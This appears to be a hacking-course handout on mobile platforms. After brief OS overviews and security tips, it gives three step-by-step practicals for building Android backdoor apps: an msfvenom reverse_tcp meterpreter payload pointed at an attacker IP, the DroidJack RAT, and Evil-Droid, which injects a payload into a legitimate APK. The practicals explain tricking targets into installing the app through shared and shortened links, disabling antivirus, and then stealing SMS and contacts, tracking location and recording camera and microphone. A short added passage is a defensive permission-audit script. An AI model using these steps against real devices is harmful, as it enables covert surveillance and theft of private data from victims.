Hacking Mobile Platforms


Mobile operating system

A mobile operating system is an OS that is specifically designed to run on
mobile devices such as mobile phones, smartphones, PDAs, tablet computers and
other handheld devices. Mobile operating systems combine features of a personal
computer operating system with other features useful for mobile or handheld use.

List of Mobile OS
1. Android OS
2. Bada
3. BlackBerry OS
4. iPhone OS / iOS
5. Palm OS
6. Symbian OS
7. webOS
8. Windows Mobile

Terms in Mobile Hacking


Stock ROM: It is the default ROM (operating system) of an Android Device.

Rooting: Rooting is the process of allowing users of smartphones, tablets and other
devices running the Android mobile operating system to attain privileged control
(known as root access) over various Android subsystems.

LineageOS: LineageOS is a free and open-source operating system for
smartphones and tablet computers, based on the Android mobile platform. It is the
successor to the custom ROM CyanogenMod.

Bricking Mobile: A device that does not turn on and function normally. The
bricked device cannot be fixed through normal procedures. Devices are bricked
due to overwriting of the Firmware or low-level system software.

Bring Your Own Device (BYOD): Bring your own device (BYOD) is a business
policy that allows employees to bring their mobile devices to their workplace.

Mobile Platform Vulnerabilities and Risks


● Malicious Apps in Store
● Mobile Malware
● Jailbreaking or Rooting
● Mobile Application Vulnerabilities
● Weak Data Security and App Encryption
● Excessive Permissions
● Weak Communication Security

www.hackerschool.in
Android OS
Android is a mobile operating system developed by Google, based on a
modified version of the Linux kernel and other open source software and designed
primarily for touchscreen mobile devices such as smartphones and tablets.

Android Architecture
Android Architecture is implemented in the form of a software stack
architecture consisting of a Linux kernel, a runtime environment and
corresponding libraries, an application framework and a set of applications.

iPhone OS (iOS)
iOS is a mobile operating system created and developed by Apple Inc. and
distributed exclusively for Apple hardware. It is a proprietary operating system
which runs on Apple mobile devices (iPhone, iPad, and iPod touch).

iOS Architecture
The architecture of iOS is a layered architecture. At the uppermost level iOS
works as an intermediary between the underlying hardware and the applications
running on the device. Apps communicate with the hardware through a collection
of well-defined system interfaces instead of directly interacting with hardware.
Interfaces make it simple to write apps that work consistently on devices
having various hardware abilities.

Hacking Android Device


● Hacking Android by Using Malicious App Infection
○ Dendroid
○ DroidJack
○ AndroRAT
● Using Kernel Level Vulnerabilities to Exploit Mobile Devices
○ Stagefright

General Guidelines for Mobile Security


● Do not load too many applications and avoid auto-upload of photos to social
networks.
● Securely wipe or delete the data when disposing of the device.
● Turn off Bluetooth if it is not necessary.
● Do not share information within GPS-enabled apps unless it is
necessary.
● Install applications from trusted application stores.

Countermeasures
● Do not directly download Android Package Files from untrusted websites.
● Never root your Android device.
● Update the operating system regularly.
● Use iOS devices on a secured and protected WiFi network.
● Deploy only trusted third-party applications on iOS devices.
● Configure ‘Find My iPhone’ and utilize it to wipe a lost or stolen device.
● In the case of IT companies, it is important to educate employees in the
organization about the BYOD policy.

INDEX
S. No. Practical Name
1 Mobile Hacking using Metasploit Framework
2 Hacking Android OS using DroidJack
3 Hacking Android OS using Evil-Droid

THIS DOCUMENT INCLUDES ADDITIONAL PRACTICALS WHICH MAY OR MAY NOT BE COVERED DURING
CLASSROOM TRAINING. FOR MORE DETAILS APPROACH LAB COORDINATORS

Practical 1: Mobile Hacking using Metasploit Framework.
Description: In this practical you will learn how to create a malicious Android app
using the msfvenom tool and how to use it to grab the target's sensitive information once the
target executes the app that we share with them.

Step 1: Create Android malware using msfvenom. Execute the following command to
create a malware that can run on Android OS and act as a backdoor.
● msfvenom -p android/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<attacker PORT> R > filename.apk

Step 2: To enable targets to download this malware, start apache server by executing
below command

Step 3: Load Metasploit Framework to start malware listener.


● Command: service postgresql start

● Command: msfconsole

Step 4: Let us use multi/handler exploit to handle reverse connections.

Step 5: Make sure to use the same payload that was used during malware creation and
configure payload options.

Step 6: Execute exploit command, which starts handler.

● Trick the target to download and execute a malicious file.


● If the victim downloads and installs the malicious application (Sampleapp.apk),
then the attacker can gain a meterpreter session.

Step 7: The Android meterpreter has different commands from the Windows and Linux versions. Enter
“?” to see the available options.

● Checking Root

● Accessing Files and Directories

● Dumping SMS

● Downloading and uploading files

● File Modification

● GPS Tracking

● Sending SMS

● Webcam live streaming

● Capturing photos using a webcam

● Recording MIC conversations

● Dumping Contact
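
From the defender's side, each capability listed above depends on an Android permission that the app must declare in its manifest, which ties back to the "Excessive Permissions" risk. The following added example (not part of the original document) audits a decoded, text-form AndroidManifest.xml for that permission set; the capability-to-permission mapping, the threshold and the sample manifests are assumptions constructed for illustration.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
P = "android.permission."

# Capability from the list above -> Android permissions that enable it.
CAPABILITY_PERMISSIONS = {
    "dump SMS": {P + "READ_SMS"},
    "send SMS": {P + "SEND_SMS"},
    "GPS tracking": {P + "ACCESS_FINE_LOCATION", P + "ACCESS_COARSE_LOCATION"},
    "camera capture": {P + "CAMERA"},
    "record microphone": {P + "RECORD_AUDIO"},
    "dump contacts": {P + "READ_CONTACTS"},
}

def requested_permissions(root):
    """Collect android:name from every <uses-permission*> element."""
    perms = set()
    for tag in ("uses-permission", "uses-permission-sdk-23"):
        for el in root.iter(tag):
            name = el.get(ANDROID_NS + "name")
            if name:
                perms.add(name)
    return perms

def audit_manifest(manifest_xml, threshold=4):
    """Flag a decoded manifest that requests >= threshold surveillance capabilities."""
    # For untrusted files in production, parse with a hardened parser such as defusedxml.
    root = ET.fromstring(manifest_xml)
    perms = requested_permissions(root)
    caps = sorted(c for c, needed in CAPABILITY_PERMISSIONS.items() if perms & needed)
    return {"package": root.get("package"), "capabilities": caps,
            "flagged": len(caps) >= threshold}

def _manifest(package, perms):
    """Build a constructed sample manifest (not taken from any real app)."""
    uses = "".join(f'<uses-permission android:name="{P}{p}"/>' for p in perms)
    return (f'<manifest xmlns:android="http://schemas.android.com/apk/res/android" '
            f'package="{package}">{uses}<application/></manifest>')

# Constructed samples: a "flashlight" app asking for far more than it needs, and a camera app.
SAMPLE_OVERPRIVILEGED = _manifest("com.example.flashlight", [
    "INTERNET", "READ_SMS", "SEND_SMS", "ACCESS_FINE_LOCATION",
    "CAMERA", "RECORD_AUDIO", "READ_CONTACTS"])
SAMPLE_BENIGN = _manifest("com.example.camera", ["CAMERA", "INTERNET"])

if __name__ == "__main__":
    for sample in (SAMPLE_OVERPRIVILEGED, SAMPLE_BENIGN):
        print(audit_manifest(sample))
```

The threshold is a triage heuristic: legitimate messaging or camera apps also request some of these permissions, so a flagged result is a prompt for review against the app's stated purpose, not a verdict.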

Practical 2: Hacking Android OS using DroidJack
Description: In this practical you will learn how to do the activities that we did in the
previous practical, but using another tool called DroidJack. This tool comes with some
advanced controlling features.
Note:
1. Disable Malware defenses (AV programs) and Firewall before proceeding
with this practical.
2. DroidJack is a Java-based application that requires the latest JRE. Install the
Java Runtime Environment (JRE) to run the DroidJack application.

Step 1: Extract the DroidJack archive. Double-click the executable (Droidjack.jar) to
launch DroidJack.

Step 2: Under Generate APK tab, enter necessary details (attacker’s IP address, port
number) and click on Generate button to create APK file.

Step 3: The APK file will be saved in the DroidJack folder.

Step 4: Under Devices, enter the Port number (assigned during APK creation) and click the
Off button, which switches to ON and starts listening for new connections.

Step 5: Visit https://send.firefox.com and upload the tezz.apk file saved in the DroidJack
folder.

Step 6: This website generates a link from where anyone can download the malicious
APK file over the internet.

● We can even shorten the link created by send.firefox.com using any online URL
shortening service (http://tinyurl.com).
● Convince your target to download and install tezz.apk.

Step 7: If the target installs the downloaded malicious APK file, the attacker can observe a
new connection under the Devices tab of the DroidJack application.

Step 8: An attacker can control the target mobile and perform several operations
remotely.

Victim’s mobile screen:

Practical 3: Hacking Android OS using Evil-Droid
Description: In this practical we will learn how to bind an original Android application file
(APK) with a malicious payload and create Android malware, using the Evil-Droid tool.
Prerequisites: openjdk-14-jdk-headless should be installed.

Step 1:
● Evil-Droid is a framework that creates an APK payload, embeds it into an
original Android application, and helps to penetrate Android mobiles. The tool
is available on GitHub; to clone it, execute the command below in a
terminal window.
● Command: git clone https://github.com/M4sc3r4n0/Evil-Droid.git

Step 2: This creates an Evil-Droid directory. Navigate into it and list the files.

Step 3: Give executable permissions to the Evil-Droid files.
● Command: chmod +x <file name>

Step 4: Execute Evil-Droid.

Step 5: On start, it checks for dependencies; if any are not found, it downloads the
tools required for it to work properly. Here it is installing Apktool. It then asks
permission to start the framework and service; click on yes.

Step 6: After the Evil-Droid framework loads, it shows the available options. Select
the 3rd option.

Step 7: Enter the IP address. By default it takes your private IP (give the public IP
if we are performing a WAN-level attack).

Step 8: Provide the port number to establish the connection.

Step 9: Provide the application name (any name) without an extension.

Step 10: It will now show a list of payload options. Choose any payload option
(meterpreter gives more control over the device).

Step 11: It will ask for the original APK file to bind the Evil-Droid app to (download any
Android APK online; some third-party apps may give errors, so it is better to choose a
small APK). Select the file.

● After the file is selected, it will start to decompile the APK, embed the
selected payload into the APK file and create a malicious APK file.
Note:
Case 1: If we get an error message like “Debug key not found. Generating
new”, provide any random details there.

Case 2: If we get an error message like “failed to verify signed artifacts”, download
apktool-*.jar from https://bitbucket.org/iBotPeaches/apktool/downloads/. Rename
the apktool-*.jar to apktool.jar and copy that file to the “Evil-Droid path/tools/”
directory. Run the tool again.

Step 12: After the APK file is selected, it decompiles the original APK, embeds
our payload into the APK file, creates a malicious APK file and, if everything works fine,
saves it to the evil apk directory in the Evil-Droid location.

Step 13: After the malware APK is created, it will ask for a selection of handlers. Select
multi-handler and click ok.

Step 14: After the handler option is selected, it will automatically start multi-handler.
Share that file with the target; if the target executes the file, we will get a connection in
the handler.
